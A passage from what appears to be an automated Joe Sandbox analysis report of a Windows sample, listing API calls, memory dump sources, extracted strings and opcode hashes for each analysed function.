                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00B71270,000000FF,?,0000003F,00000000,?), ref: 00ADBC36
                                                                                                    • _free.LIBCMT ref: 00ADBD4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 314583886-0
                                                                                                    • Opcode ID: df06299222bcaab79e64c8d2206158b47ae68044e5fcaf8be8ef8be7d2f82941
                                                                                                    • Instruction ID: c2f24332e21b104e3b06f448de9771a9a9c6fbc4106cadc752754683b79e1050
                                                                                                    • Opcode Fuzzy Hash: df06299222bcaab79e64c8d2206158b47ae68044e5fcaf8be8ef8be7d2f82941
                                                                                                    • Instruction Fuzzy Hash: 83C12471920244EFCB20DF688951BAA7BB8EF45350F16459BE496DB362EB308E41D770
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                                                                                                      • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B0D420
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D470
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D481
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B0D498
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B0D4A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                    • Opcode ID: 9294621d6fc79b04b973a31e5d3eea4c0a7d8f3768965c68ad7a054650d6d37a
                                                                                                    • Instruction ID: 53ecac252129edfabf86fa6edd83254b394f4351e530006b4c74593a9745ccd3
                                                                                                    • Opcode Fuzzy Hash: 9294621d6fc79b04b973a31e5d3eea4c0a7d8f3768965c68ad7a054650d6d37a
                                                                                                    • Instruction Fuzzy Hash: 48317E310083419BC701EFA4D9919AFBBE8BE96300F444A5DF4D5932D1EB34AA09CB63
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
                                                                                                    • Instruction ID: b534a735dd88f59411d6240c58beb37ee81322cbe11e42393960f5987c94e018
                                                                                                    • Opcode Fuzzy Hash: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
                                                                                                    • Instruction Fuzzy Hash: 4DC22771E086288FDB25DF289D407EAB7B5EB49305F1541EBD84EEB240E775AE818F40
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00B164DC
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B16639
                                                                                                    • CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B16650
                                                                                                    • CoUninitialize.OLE32 ref: 00B168D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                    • String ID: .lnk
                                                                                                    • API String ID: 886957087-24824748
                                                                                                    • Opcode ID: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
                                                                                                    • Instruction ID: 3e8e5443ccd9edc074f6b01ba30964a65be97cff8a39c544244379a615fe1771
                                                                                                    • Opcode Fuzzy Hash: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
                                                                                                    • Instruction Fuzzy Hash: D1D15871508301AFC304EF24C981AABB7E9FF99704F54896DF5958B2A1EB30ED45CB92
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00B222E8
                                                                                                      • Part of subcall function 00B1E4EC: GetWindowRect.USER32(?,?), ref: 00B1E504
                                                                                                    • GetDesktopWindow.USER32 ref: 00B22312
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B22319
                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B22355
                                                                                                    • GetCursorPos.USER32(?), ref: 00B22381
                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B223DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2387181109-0
                                                                                                    • Opcode ID: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
                                                                                                    • Instruction ID: 33e90903394f0d318b6f22e5f53192137567a4c4b400ae2db0a29eed6bbe0535
                                                                                                    • Opcode Fuzzy Hash: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
                                                                                                    • Instruction Fuzzy Hash: 9E31FE72504315AFCB20DF54D849B9BBBE9FF88310F100A59F998E7181DB34EA08CB96
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B19B78
                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B19C8B
                                                                                                      • Part of subcall function 00B13874: GetInputState.USER32 ref: 00B138CB
                                                                                                      • Part of subcall function 00B13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966
                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B19BA8
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B19C75
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1972594611-438819550
                                                                                                    • Opcode ID: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
                                                                                                    • Instruction ID: 041b9fca0189571445e2e61af249377ede8bf373f61f04d3da2f8f1a804c0ba8
                                                                                                    • Opcode Fuzzy Hash: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
                                                                                                    • Instruction Fuzzy Hash: C341817190424AAFCF55DFA4C995AEEBBF8EF05310F644095F845A3291EB309E84CFA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AB9A4E
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00AB9B23
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00AB9B36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$LongProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3131106179-0
                                                                                                    • Opcode ID: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
                                                                                                    • Instruction ID: b7245334d9f91cbc874a39879475187470abb355df4f274b72c88254a1e6188b
                                                                                                    • Opcode Fuzzy Hash: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
                                                                                                    • Instruction Fuzzy Hash: E0A10770118548AEE728AB7C8C99EFF3AADDF42380F25410DF712D6693CE259D42D272
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                                                                                                      • Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B2185D
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B21884
                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00B218DB
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B218E6
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00B21915
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1601658205-0
                                                                                                    • Opcode ID: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
                                                                                                    • Instruction ID: 4230128f1b48b1f44997ff55e7442b36e42af7a47653bfba389ba881e0f2ce9e
                                                                                                    • Opcode Fuzzy Hash: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
                                                                                                    • Instruction Fuzzy Hash: 8651B471A00210AFEB10AF24D9C6F6A77E5EB45718F188498F90A6F3D3D771ED418BA1
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                    • String ID:
                                                                                                    • API String ID: 292994002-0
                                                                                                    • Opcode ID: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
                                                                                                    • Instruction ID: a0a26260ebd0e644f76573c787c316efaf8392e114f7788c5bd23f7a4622a5c2
                                                                                                    • Opcode Fuzzy Hash: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
                                                                                                    • Instruction Fuzzy Hash: AF21A3317402105FD7208F2ED894B6A7BE9EF95325F7994A8E8469F351CB71EC42CB90
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                    • API String ID: 0-1546025612
                                                                                                    • Opcode ID: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
                                                                                                    • Instruction ID: 5e5bcb3476b5e652d875b478a33f857004c48d4df0097972f13f0a8553ae801c
                                                                                                    • Opcode Fuzzy Hash: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
                                                                                                    • Instruction Fuzzy Hash: C1A2A070E0065ACBDF24CF59C9807EEB7B1BF55314F2485AAE815AB285EB349D81CF90
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00B2A6AC
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00B2A6BA
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00B2A79C
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B2A7AB
                                                                                                      • Part of subcall function 00ABCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AE3303,?), ref: 00ABCE8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991900642-0
                                                                                                    • Opcode ID: 7a38faf08a08978e5ce0cbd030b18427aec7d99b669fd29a5d96b9b6dc18f436
                                                                                                    • Instruction ID: 3a9b4f638c8fada9f0cb94131199d44bebe0cb2693496e186920441aef4e7b25
                                                                                                    • Opcode Fuzzy Hash: 7a38faf08a08978e5ce0cbd030b18427aec7d99b669fd29a5d96b9b6dc18f436
                                                                                                    • Instruction Fuzzy Hash: 59514C71508310AFD710EF24D986E6BBBE8FF89754F00895DF59997292EB30D904CB92
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B0AAAC
                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00B0AAC8
                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B0AB36
                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B0AB88
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 432972143-0
                                                                                                    • Opcode ID: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
                                                                                                    • Instruction ID: 7e6cc47a851bda0a7eed12a27dee2d2ae4f69bc022c5306c75770af0c5275e0e
                                                                                                    • Opcode Fuzzy Hash: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
                                                                                                    • Instruction Fuzzy Hash: 2C311431A40308AEFB359B68CC45BFA7FE6EB44310F144A9AF581A61E1D774C985C762
                                                                                                    APIs
                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00B1CE89
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00B1CEEA
                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00B1CEFE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 234945975-0
                                                                                                    • Opcode ID: ca5b7149b661470b8bade78ef12a2b980dc8bdd7550c018c2e6937b275440f7f
                                                                                                    • Instruction ID: cfff0e00f2ef54ebbfc1b09d1eb39fae21866be3dfd4b0df094cde30bc0d6dd6
                                                                                                    • Opcode Fuzzy Hash: ca5b7149b661470b8bade78ef12a2b980dc8bdd7550c018c2e6937b275440f7f
                                                                                                    • Instruction Fuzzy Hash: 8A21C172540305DBD730CFA5C988BABBBFCEB00314F60446EE546E2151EB74ED898B54
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B082AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen
                                                                                                    • String ID: ($|
                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                    • Opcode ID: 48b14b2c000a4672e067e53ebd8d759cd131e3684290a438b00951f664956660
                                                                                                    • Instruction ID: 105ee55e0de752400932f6f22df6ee6f13aac752844acd5d05f1f56ad03253dc
                                                                                                    • Opcode Fuzzy Hash: 48b14b2c000a4672e067e53ebd8d759cd131e3684290a438b00951f664956660
                                                                                                    • Instruction Fuzzy Hash: 08323775A007059FC728CF59C481A6ABBF1FF48710B15C5AEE49ADB3A1EB70EA41CB44
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B15CC1
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B15D17
                                                                                                    • FindClose.KERNEL32(?), ref: 00B15D5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 3541575487-0
                                                                                                    • Opcode ID: 4fb2ac95d6c55d2bcde127d80e19f790e9b8093a533980d9b373f87f4185a735
                                                                                                    • Instruction ID: 13e6c1796433518b073a9bc834e626e499c7a9e9436bca8fb1b42576154eb187
                                                                                                    • Opcode Fuzzy Hash: 4fb2ac95d6c55d2bcde127d80e19f790e9b8093a533980d9b373f87f4185a735
                                                                                                    • Instruction Fuzzy Hash: 37517A74604601DFC724DF28D494E9ABBE4FF4A324F5485ADE95A8B3A1CB30ED84CB91
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00AD271A
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AD2724
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00AD2731
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
